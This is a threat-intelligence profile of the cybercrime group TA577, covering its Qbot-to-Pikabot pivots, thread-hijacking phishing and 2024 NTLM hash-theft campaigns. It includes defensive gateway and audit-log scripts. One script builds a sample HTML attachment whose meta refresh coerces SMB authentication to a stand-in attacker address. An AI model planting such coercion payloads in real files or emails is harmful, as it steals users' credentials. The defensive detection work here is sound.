TA577
One of the most prolific and adaptive initial access brokers in the eCrime ecosystem — informally nicknamed the "letters" affiliate for its use of campaign IDs like AA, BB, and TR. TA577 functioned as one of Qbot's primary distributors for years, then rapidly pivoted through the disruption cycle: DarkGate and IcedID after the August 2023 Qbot takedown, Pikabot and Latrodectus by late 2023, and a previously unobserved capability in February 2024 — large-scale NTLM hash theft via thread-hijacked HTML attachments. Proofpoint has associated TA577 campaigns with follow-on Black Basta ransomware infections, and the group's sustained operational tempo, rapid TTP iteration, and broadening from pure malware delivery toward credential collection mark it as one of the most adaptable eCrime actors currently tracked.
Overview
TA577 is a financially motivated cybercrime threat actor tracked by Proofpoint since mid-2020, also identified by IBM X-Force as Hive0118. The group operates as an initial access broker — running high-volume phishing infrastructure to install malware loaders on enterprise endpoints, then selling or providing that access downstream to ransomware operators, most notably those connected to Black Basta. TA577 is considered one of the most capable and operationally consistent IABs in the current eCrime ecosystem, distinguished not by the sophistication of any single technique but by the speed and reliability with which it adapts to takedowns and detection cycles.
The group built its reputation as a primary Qbot (QakBot) affiliate — informally called the "letters" affiliate because its Qbot campaign identifiers used letter combinations like AA, BB, and TR, distinguishing it from the parallel "presidents" affiliate TA570 that used US president names. When the FBI and international law enforcement disrupted Qbot infrastructure in August 2023, TA577 moved faster than any other major Qbot affiliate to replace it — deploying DarkGate, IcedID, and Pikabot within weeks, and becoming one of the first actors observed distributing Latrodectus (a new loader likely written by the same developers as IcedID) in November 2023.
In February 2024, Proofpoint documented a capability shift that had never been previously observed from TA577: targeted NTLM hash theft campaigns using thread-hijacked emails with zipped HTML attachments that silently triggered SMB connections to attacker-controlled servers, capturing NTLMv2 challenge/response pairs. The campaigns sent tens of thousands of messages to hundreds of organizations globally over two consecutive days — with no malware payload, only credential capture. This evolution from pure malware distribution to active credential reconnaissance marked a significant expansion of the group's operational scope beyond its IAB role.
TA577 remains active through 2025 and into early 2026. October 2024 campaigns continued multi-loader delivery using Pikabot and Latrodectus alongside NTLM-targeted credential theft against large enterprises globally, and in January 2025 the group expanded its campaigns internationally across many industries, with defenders responding to TA577 initial access activity again reporting follow-on Black Basta intrusions. The group has shown no sign of slowing despite repeated disruptions to the malware families it distributes.
Payload Pivot Timeline
TA577's defining characteristic is the speed of its pivots after disruptions. The timeline below documents the group's payload evolution from Qbot through its current multi-loader and credential-theft operations.
From mid-2020 until the August 2023 takedown, TA577 was one of the two most active Qbot affiliates. Its high-volume phishing campaigns delivered malicious Office macro documents, then moved to OneNote and PDF containers once Microsoft began blocking macros in internet-sourced documents by default in 2022. Campaign IDs with letter themes (AA, BB, TR) distinguished TA577 from the TA570 "presidents" affiliate. Follow-on ransomware infections, primarily Black Basta, were the downstream use of access sold from these campaigns. IcedID, SystemBC, SmokeLoader, Ursnif, and Cobalt Strike were also distributed during this period.
The FBI-led Operation Duck Hunt disrupted Qbot infrastructure in August 2023. Within weeks, TA577 had shifted payload delivery to DarkGate — a MaaS loader with built-in defense evasion, C2, and persistence — and IcedID. Deutsche Telekom CERT documented the first TA577 DarkGate campaign on September 22, 2023. The speed of the pivot confirmed that TA577 had existing relationships with alternative malware operators and maintained infrastructure capable of rapid payload substitution.
Through November and December 2023, TA577 transitioned primary payload delivery to Pikabot — a modular loader with C2 and anti-analysis capabilities — and was simultaneously the first actor observed distributing Latrodectus, a new downloader Proofpoint assessed as likely written by the same developers as IcedID. TA577 used Latrodectus in at least three campaigns in November 2023 before reverting to Pikabot as the primary payload. Latrodectus subsequently became almost exclusively associated with TA578 from mid-January 2024 onward.
February 26 and 27, 2024 brought a previously unobserved TA577 capability: two consecutive campaigns using thread-hijacked emails with zipped HTML attachments. Unzipping wrote the HTML to disk as a local file, and opening that file triggered an SMB connection to an attacker-controlled server, which captured the victim's NTLMv2 challenge/response pair. Tens of thousands of messages targeted hundreds of organizations globally. No malware was delivered; the sole purpose was credential capture, a technique Proofpoint had never before observed from TA577.
TA577 continued multi-loader campaigns through 2024 and into 2025, combining Pikabot and Latrodectus delivery with ongoing NTLM hash theft operations against large enterprises. IBM X-Force (Hive0118) documented the group delivering Dave-crypted PikaBot samples using crypters associated with former Trickbot/Conti syndicate members, indicating ongoing relationships with the broader Eastern European eCrime ecosystem. January 2025 saw expanded international campaign activity with Black Basta intrusion incidents continuing to follow TA577 initial access.
Target Profile
TA577 is explicitly broad-sector and broad-geography in its targeting — Proofpoint describes the group as conducting "broad targeting across various industries and geographies." Unlike espionage APTs with sector-specific mandates, TA577's targeting is driven by volume and the downstream requirements of its ransomware customers rather than any intelligence collection priority.
- All sectors — opportunistic: TA577 has targeted organizations across financial services, healthcare, government, manufacturing, professional services, education, and technology. No sector exclusions are documented. The group's high-volume campaigns are designed to succeed through scale rather than precision.
- Global geography: Campaigns have targeted organizations in North America, Europe, the Asia-Pacific region, and globally. The February 2024 NTLM hash theft campaigns alone targeted hundreds of organizations across multiple countries simultaneously.
- Enterprise-scale targets: The downstream ransomware connection to Black Basta indicates a preference for large enterprise targets capable of paying substantial ransoms — TA577's access sales are most valuable when they lead to high-revenue ransomware negotiations. Small organizations compromised in bulk phishing are secondary to the enterprise access that drives IAB revenue.
- Email-reachable employees: TA577's initial access model is email-centric. Any organization whose employees receive external email and may open attachments or click links is in scope. Thread hijacking campaigns specifically target employees who receive replies to existing email chains — a scenario that reduces suspicion even for security-aware users.
Tactics, Techniques & Procedures
TA577's TTP set is defined by email delivery sophistication and rapid adaptation. The group invests in delivery mechanism quality — thread hijacking, container formats that bypass macro restrictions, and novel authentication coercion — rather than custom malware development.
| MITRE ID | Technique | Description |
|---|---|---|
| T1566.001 | Thread Hijacking — Reply-Chain Injection | TA577's signature delivery technique. Legitimate prior email threads, stolen from compromised mailboxes or obtained through other means, are used as the basis for malicious "reply" emails. The attacker's message appears in the recipient's inbox as a reply to an existing conversation they recognize, significantly increasing the likelihood that the attachment or link is opened. Thread hijacking was used in the February 2024 NTLM campaigns and consistently throughout Pikabot and Latrodectus delivery. |
| T1204.002 | Container Delivery — ZIP / HTML / OneNote / PDF | Following Microsoft's 2022 rollout of macro blocking for documents from the internet, TA577 pivoted to container-based delivery: malicious Office documents inside password-protected ZIP archives, HTML smuggling (embedding Base64-encoded payloads in HTML files that reconstruct and execute on the client), OneNote files with embedded malicious links, and PDF files with URL-based payload retrieval. The NTLM campaign delivered HTML files inside ZIP archives specifically to generate a local file — bypassing Outlook's July 2023 patch that would have blocked direct file URI links in email bodies. |
| T1187 | NTLM Hash Capture — SMB Coercion | First observed February 26–27, 2024. Thread-hijacked emails deliver ZIP archives containing HTML files. Once unzipped to a local file and opened, the HTML uses a meta refresh to a file scheme URI ending in .txt that points at an attacker-controlled SMB server. Windows automatically attempts NTLM authentication against that server, sending the user's NTLMv2 challenge/response pair, which the attacker captures with Impacket running on the SMB server. A captured NTLMv2 response is not the NT hash and cannot be replayed in a pass-the-hash attack; it can be cracked offline to recover the plaintext password, and a server that captures it live can relay the authentication to another service that does not enforce signing. Disabling SMB guest access does not prevent capture, because the client attempts authentication regardless. Blocking outbound SMB (ports 445/139) at the network perimeter is the primary mitigation. |
| T1059.001 | Living-Off-the-Land — PowerShell / Rundll32 | After initial access via phishing, TA577 uses LOLBins (Living-Off-the-Land Binaries) including PowerShell, CMD, and Rundll32 to execute the payloads the loader downloads. This reduces reliance on custom executables and leverages trusted Windows components that may not trigger endpoint detection. Payloads are served from fast flux DNS infrastructure and compromised WordPress sites. |
| T1568.001 / T1071 | Fast Flux DNS / WordPress C2 Infrastructure | TA577 uses fast flux DNS (rapidly rotating IP addresses behind C2 domains) to impede takedowns and domain-based blocking. Compromised WordPress sites serve as intermediate stages for payload hosting and C2 relay, leveraging the reputation of legitimate websites to bypass URL reputation filters on email gateways and proxies. |
| T1078 | Credential-to-Persistence Chain | The February 2024 NTLM campaigns delivered no malware; their function appears to be reconnaissance: identifying valuable targets by capturing credentials and environment details (computer names, domain names, usernames) from the NTLMv2 authentication attempt. Will Dormann and other researchers suggested this may be used to assess which targets are worth pursuing with subsequent ransomware-enabling malware. Where a captured NTLMv2 response is cracked to a plaintext password, or relayed live, the resulting valid-account access enables lateral movement, particularly in environments that do not enforce MFA or SMB signing. |
Known Campaigns
Selected documented operations highlighting TA577's payload evolution and expanding capability set.
TA577's foundational activity as one of the two largest Qbot affiliates — the "letters" campaign identifier theme (AA, BB, TR) distinguishing it from TA570's president-themed IDs. Campaigns ran continuously across multiple sectors and geographies, deploying Qbot via malicious Office documents. As Microsoft incrementally restricted macros (macros disabled for downloaded files in July 2022), TA577 adapted delivery through password-protected ZIPs, ISO containers, and OneNote files. Black Basta ransomware was documented as a downstream outcome of TA577-sourced access. IcedID, SystemBC, SmokeLoader, Ursnif, and Cobalt Strike were distributed alongside Qbot.
Deutsche Telekom CERT's CTI team documented TA577's first post-Qbot campaign on September 22, 2023 — less than a month after the August 2023 Qbot disruption. TA577 deployed DarkGate as its primary payload replacement, demonstrating the speed of its pivot. DarkGate's MaaS model (offered on cybercrime forums with built-in defense evasion, C2, and persistence) made it a technically capable Qbot replacement. This campaign validated that TA577's infrastructure and delivery capability were intact post-disruption even as the specific payload changed.
In November 2023, TA577 became the first documented actor to distribute Latrodectus — a new downloader assessed by Proofpoint and Team Cymru as likely written by the same IcedID developers. TA577 used Latrodectus in at least three campaigns using thread-hijacked messages containing URLs leading to zipped JavaScript or ISO files. The zipped JavaScript used curl to download and execute Latrodectus; the ISO contained a LNK executing the embedded DLL with the "nail" export. By late November 2023, TA577 had reverted to Pikabot as its primary payload — Latrodectus subsequently became almost exclusively distributed by TA578.
On February 26 and 27, 2024, TA577 launched two campaigns that Proofpoint had never previously observed from the group: targeted NTLM credential capture with no malware delivery. Thread-hijacked emails delivered ZIP archives containing recipient-customized HTML files, each with a unique hash to complicate signature-based detection. Unzipping wrote the HTML to disk, and opening that local file triggered a meta refresh to a file scheme URI pointing at an attacker-controlled SMB server running Impacket. Windows automatically authenticated to the server, handing over the user's NTLMv2 challenge/response pair. The campaigns reached tens of thousands of recipients across hundreds of organizations globally in 48 hours.
Through 2024 and continuing into 2025, TA577 sustained parallel operations: multi-loader phishing campaigns delivering Pikabot and Latrodectus for malware-based initial access, alongside continued NTLM hash theft operations targeting large enterprises globally. IBM X-Force documented the group deploying Dave-crypted PikaBot samples using crypters linked to former Conti/Trickbot syndicate members — indicating ongoing collaboration with the broader Eastern European eCrime developer community. January 2025 saw expanded international campaign volume with Black Basta intrusions continuing downstream of TA577 initial access.
Tools & Malware
TA577 does not develop its own malware. It operates as a consumer and distributor of MaaS (malware-as-a-service) platforms, demonstrating rapid adoption of whatever loaders are most evasion-effective at a given moment.
- Qbot / QakBot (2020–2023): The group's primary payload for over three years. A modular banking trojan with reconnaissance, credential theft, C2, and anti-analysis capabilities. TA577 was one of two major Qbot affiliates — the other being TA570 ("presidents" affiliate). Disrupted by Operation Duck Hunt (FBI) in August 2023.
- Pikabot (2023–present): TA577's most sustained post-Qbot payload. A modular loader with anti-analysis, C2, and payload execution capabilities. TA577 has been observed delivering Pikabot via a variety of continuously evolving attack chains — OneNote attachments, HTML smuggling, disk images, and others — reflecting the group's commitment to adapting delivery mechanisms as each is detected and blocked.
- Latrodectus (Nov 2023 — first distributor): A new downloader likely developed by the IcedID authors, first distributed by TA577 in November 2023. Proofpoint and Team Cymru analysis tied it to IcedID-related backend infrastructure and jumpboxes. It evades sandboxes by checking the running process count, requiring a 64-bit OS, and validating the MAC address. TA577 used Latrodectus briefly before reverting to Pikabot; TA578 subsequently adopted it as a primary payload.
- DarkGate (Sep 2023): A MaaS loader offered on cybercrime forums, adopted by TA577 as an immediate Qbot replacement. Built-in defense evasion, C2, and persistence. TA577 was among the first actors to distribute DarkGate post-Qbot disruption.
- IcedID (during 2023 transition): Used alongside DarkGate and Pikabot during the post-Qbot pivot period. TA577's use of IcedID — and its distribution of Latrodectus (likely from IcedID developers) — suggests an established relationship with the IcedID operator network.
- Impacket (NTLM campaigns): An open-source Python toolkit run on the attacker-controlled SMB servers to capture NTLMv2 challenge/response pairs from victims' automatic NTLM authentication attempts. Impacket is not something a legitimate file server runs, so its presence on the responding hosts served as an indicator in Proofpoint's 2024 analysis.
- Historical payloads — SystemBC, SmokeLoader, Ursnif, Cobalt Strike: Distributed alongside Qbot during the pre-2023 period, providing multiple post-access capability paths for downstream ransomware operators who purchased TA577 access.
Indicators of Compromise
TA577 rotates delivery infrastructure rapidly. Behavioral detection of email delivery patterns and outbound connection behaviors is more durable than specific domain or hash IOCs.
For the 2024 NTLM hash theft campaign: disabling SMB guest access does not prevent credential capture. The victim's system attempts NTLM authentication against the external SMB server regardless of guest access settings, because it must authenticate before the server can tell it whether guest access applies. The most effective network control is blocking outbound SMB (ports 445 and 139) at the firewall perimeter; the Restrict NTLM group policy described under Mitigation is the endpoint-side equivalent. Windows 11 adds a built-in option to block NTLM authentication over SMB. Outlook clients patched since July 2023 no longer follow direct file URI links in email bodies, but that protection does not apply when the URI sits inside an HTML file delivered in a ZIP archive and opened from disk, which is exactly how TA577 bypassed the patch.
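Because the durable signal here is the delivery pattern rather than any hash or domain, the following added example (written for this page, not Proofpoint's detection content or any vendor's gateway rule) shows the check an email gateway or SOAR step can run: open the ZIP attachment in memory, recurse into nested archives, and flag HTML members whose meta refresh or link attributes resolve to a file:// URI or a bare UNC path, which is what makes Windows open an outbound SMB session. The attachment it scans is constructed in the shape the text describes (203.0.113.10 is a documentation address), not a real TA577 artifact.

```python
"""Added example for this page, not a vendor or Proofpoint rule: inspect a
ZIP attachment for HTML members that would coerce an outbound SMB
authentication. The sample attachment is constructed, not a TA577 file."""
import html
import io
import re
import zipfile

META_TAG = re.compile(r"<meta\b[^>]*>", re.I)
CONTENT_ATTR = re.compile(r"""content\s*=\s*["']?([^"'>]+)""", re.I)
URL_ATTR = re.compile(r"""\b(?:href|src|action|data)\s*=\s*["']?([^"'\s>]+)""", re.I)
# file scheme URIs and bare UNC paths both make Windows open an SMB session
COERCION_TARGET = re.compile(r"""(?:file:/{2,}|\\\\)[^\s"'<>;]+""", re.I)
HTML_EXT = (".htm", ".html", ".xhtml", ".shtml")


def scan_html(member, data):
    """Return (member, where, target) for every SMB-coercing reference."""
    text = html.unescape(data.decode("utf-8", "replace"))
    hits = []
    for tag in META_TAG.findall(text):
        if "refresh" not in tag.lower():
            continue
        m = CONTENT_ATTR.search(tag)
        t = COERCION_TARGET.search(m.group(1)) if m else None
        if t:
            hits.append((member, "meta-refresh", t.group(0)))
    for m in URL_ATTR.finditer(text):
        t = COERCION_TARGET.search(m.group(1))
        if t:
            hits.append((member, "attribute", t.group(0)))
    return hits


def scan_zip(data, depth=0, max_depth=3):
    """Walk a ZIP held in memory, recursing into nested archives."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            name = info.filename
            if info.flag_bits & 0x1:  # encrypted member: cannot inspect, escalate instead
                hits.append((name, "encrypted-member", ""))
                continue
            member = z.read(name)
            lower = name.lower()
            head = member[:2048].lower()
            if lower.endswith(".zip") and depth < max_depth:
                hits += [("/".join((name, n)), w, t) for n, w, t in scan_zip(member, depth + 1, max_depth)]
            elif lower.endswith(HTML_EXT) or b"<meta" in head or b"<html" in head:
                hits += scan_html(name, member)
    return hits


def gateway_decision(attachment):
    """Block on any coercion or uninspectable member; return the evidence."""
    hits = scan_zip(attachment)
    return ("block" if hits else "allow"), hits


def build_constructed_sample():
    """A ZIP-in-ZIP with one coercing HTML and one benign HTML; constructed."""
    coercing = (b'<html><head><meta http-equiv="refresh" '
                b'content="0; url=file://203.0.113.10/docs/invoice-4471.txt"></head>'
                b'<body>Loading document...</body></html>')
    benign = b'<html><body><a href="https://example.com/report">Quarterly report</a></body></html>'
    outer, inner = io.BytesIO(), io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("invoice_4471.html", coercing)
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("newsletter.html", benign)
        z.writestr("Re_ Invoice 4471.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    print(gateway_decision(build_constructed_sample()))
```

Two choices worth keeping when adapting this: HTML is identified by content as well as extension, since a renamed member still opens in the browser, and an encrypted member is treated as a finding rather than skipped, because a password-protected archive is itself part of the delivery pattern the page describes.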
Mitigation & Defense
TA577's primary attack surface is email — blocking or detecting malicious email delivery is significantly more effective than attempting post-execution containment of the loaders it distributes.
- Block outbound SMB at network perimeter: Ports 445 and 139 should not be permitted to reach external internet addresses from internal workstations. This is the primary mitigation against TA577's NTLM hash theft campaign — it prevents the automatic SMB authentication that delivers NTLMv2 hashes to the attacker's server. This control also benefits against a broad class of NTLM coercion attacks beyond TA577's specific technique.
- Email gateway controls for ZIP-containing HTML: Filter or sandbox ZIP archives containing HTML files from external senders. HTML files inside ZIPs are a delivery mechanism specifically designed to bypass both Outlook's file URI patch (July 2023) and email scanners that inspect only top-level attachments. An email gateway that recursively inspects archive contents will detect this delivery pattern.
- Thread hijacking awareness training: TA577's thread hijacking exploits the trust employees place in replies to recognized email conversations. Security awareness training should explicitly address that a reply from a familiar address on a known thread does not guarantee legitimacy — particularly if the reply contains an unexpected attachment or link. Thread-hijacked phishing remains effective precisely because it bypasses the standard "did I expect this email?" heuristic.
- Patch Outlook for file URI blocking: Ensure all Outlook clients carry the July 2023 security update that blocks direct file scheme URI links in email bodies (part of Microsoft's 2023 hardening of Outlook against NTLM leaks, which earlier that year also addressed CVE-2023-23397). This alone does not stop TA577's ZIP-wrapped HTML technique, but it eliminates the simpler direct-URI variant that other actors still use.
- Windows 11 NTLM-over-SMB blocking: Windows 11 introduced a built-in feature to block NTLM authentication over SMB — enabling this provides an endpoint-level control supplementing the perimeter SMB block. Organizations that cannot enforce perimeter SMB blocking (e.g., due to legitimate external SMB requirements) should prioritize enabling this Windows 11 control.
- Enforce strong passwords, signing, and MFA: A captured NTLMv2 challenge/response pair cannot be replayed as a pass-the-hash credential, but it can be cracked offline, and a weak or dictionary password falls quickly. Long, non-dictionary passwords, and randomly generated passwords for service accounts, make captured pairs worthless to the attacker. Requiring SMB signing and LDAP signing with channel binding blocks live relay of the coerced authentication. MFA does not stop the NTLM exchange itself, but it limits what an attacker can do with a cracked password against MFA-protected services; prioritize enrollment for administrator accounts.
- Configure Group Policy to restrict outgoing NTLM traffic: The Windows Group Policy setting "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" can be set to deny NTLM authentication to external servers entirely, or to an allowlist of known legitimate servers. Setting this to "Deny all" prevents automatic NTLM authentication to attacker-controlled SMB servers without requiring perimeter firewall changes. Proofpoint recommends testing this in audit mode before enforcement, as it can cause authentication failures against legitimate servers.
- Monitor for anomalous Pikabot and Latrodectus IoCs: Consult current Proofpoint and Team Cymru threat intelligence feeds for active Pikabot and Latrodectus C2 infrastructure. Both loaders use distinctive C2 communication patterns (Latrodectus uses HTTPS with specific TLS characteristics; Pikabot uses RC4-encrypted C2 over HTTPS). EDR vendors publish detection rules for both families that should be kept current given the active update cycles documented in TA577 campaigns.
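The audit-before-enforce step in the Restrict NTLM recommendation above produces a list of servers to allow and a list of targets to investigate, and sorting one from the other is the work. The following is an added example written for this page, not a Microsoft or Proofpoint tool. With "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" set to Audit all, Windows writes event ID 8001 to the Microsoft-Windows-NTLM/Operational log for each outgoing NTLM authentication that Deny all would block. The script assumes those events have been exported one per line with the event ID first and the message's "label: value" fields joined by " | " (the export format and the sample lines are constructed; the internal DNS suffix and address ranges are placeholders to replace with the real environment's values). It separates internal servers that belong in "Add remote server exceptions for NTLM authentication" from external targets, which, coming from a mail client or browser process, are the coercion signal.

```python
"""Added example for this page, not a Microsoft or Proofpoint tool: triage
a flattened export of NTLM Operational event 8001 (outgoing NTLM that
"Deny all" would block) into an exception list and external hits. The
export format, the sample lines, and the internal suffix/ranges are all
constructed or placeholders for the real environment."""
import ipaddress
import re

# Placeholders: replace with the organization's AD DNS suffixes and internal ranges.
INTERNAL_SUFFIXES = ("corp.example",)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

CONSTRUCTED_EVENTS = """\
# constructed export, one 8001 event per line
8001 | Target server: cifs/fs01.corp.example | Supplied user: jdoe | Supplied domain: CORP | Name of client process: C:\\Windows\\explorer.exe
8001 | Target server: cifs/print02.corp.example | Supplied user: jdoe | Supplied domain: CORP | Name of client process: C:\\Windows\\System32\\spoolsv.exe
8001 | Target server: cifs/203.0.113.10 | Supplied user: jdoe | Supplied domain: CORP | Name of client process: C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE
8001 | Target server: cifs/10.20.30.40 | Supplied user: svc_backup | Supplied domain: CORP | Name of client process: C:\\Program Files\\BackupVendor\\backup.exe
"""

FIELD = re.compile(r"^([^:]+):\s*(.*)$")


def parse_events(text):
    """Parse 'ID | label: value | label: value' lines into dicts; skip the rest."""
    events = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split(" | ")]
        if not parts[0].isdigit():
            continue
        ev = {"id": int(parts[0])}
        for seg in parts[1:]:
            m = FIELD.match(seg)
            if m:
                ev[m.group(1).strip().lower()] = m.group(2).strip()
        events.append(ev)
    return events


def target_host(target):
    """'cifs/host[:port]' -> 'host' (IPv4 and names; IPv6 literals not handled)."""
    return target.split("/", 1)[-1].split(":")[0].lower()


def is_internal(host):
    """Internal if inside a configured range, a single-label name, or under an internal suffix."""
    try:
        ip = ipaddress.ip_address(host)
        return any(ip in net for net in INTERNAL_NETS)
    except ValueError:
        pass
    if "." not in host:  # single-label NetBIOS name
        return True
    return any(host == s or host.endswith("." + s) for s in INTERNAL_SUFFIXES)


def triage(text):
    """Return (exception_list, external_hits).

    exception_list feeds the 'Add remote server exceptions' policy;
    external_hits are (host, user, process) tuples to investigate.
    """
    exceptions, external = set(), []
    for ev in parse_events(text):
        if ev.get("id") != 8001 or "target server" not in ev:
            continue
        host = target_host(ev["target server"])
        if is_internal(host):
            exceptions.add(host)
        else:
            external.append((host, ev.get("supplied user"), ev.get("name of client process")))
    return sorted(exceptions), external


if __name__ == "__main__":
    allow, hits = triage(CONSTRUCTED_EVENTS)
    print("exceptions:", allow)
    for host, user, proc in hits:
        print("investigate:", host, user, proc)
```

Run this over a week or two of audit data before flipping the policy to Deny all; anything that appears in the external list from a user-facing process is worth treating as an incident, while the exception list is what keeps legitimate cross-domain or cloud file shares working once enforcement is on.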
TA577 illustrates a pattern common to the most durable eCrime actors: the value of the operator exceeds the value of any specific tool they distribute. When Qbot was disrupted, TA577's capability loss was temporary because the group maintained relationships with alternative MaaS operators, established delivery infrastructure, and a large stock of compromised email threads for thread hijacking. The February 2024 NTLM campaigns are particularly significant because they represent TA577 expanding beyond its IAB role — suggesting either a strategic decision to verticalize operations or a testing of reconnaissance capability for subsequent targeting. Proofpoint's observation that "the rate at which TA577 adopts and distributes new TTPs suggests the threat actor likely has the time, resources, and experience to rapidly iterate" is a consistent theme: this is not a small opportunistic actor but a well-resourced professional eCrime operation with sustained development capacity.
Sources & Further Reading
Attribution and references used to build this profile.
- Proofpoint — TA577's Unusual Attack Chain Leads to NTLM Data Theft (2024)
- BleepingComputer — Hackers Steal Windows NTLM Authentication Hashes in Phishing Attacks (2024)
- Proofpoint — Latrodectus: Spider Bytes for Ice (Latrodectus analysis, 2024)
- Help Net Security — New Latrodectus Loader Steps in for Qbot (2024)
- Brandefense — TA577 / Hive0118: The Evolving Phishing Specialist Behind Modern Malware Campaigns (2026)
- Red Canary — Qbot Threat Detection Report (includes TA577 post-pivot analysis)
- The Hacker News — Warning: Thread Hijacking Attack Targets IT Networks, Stealing NTLM Hashes (2024)
- Darktrace — Hashing Out: TA577 and Detection of NTLM Hash Theft (2024)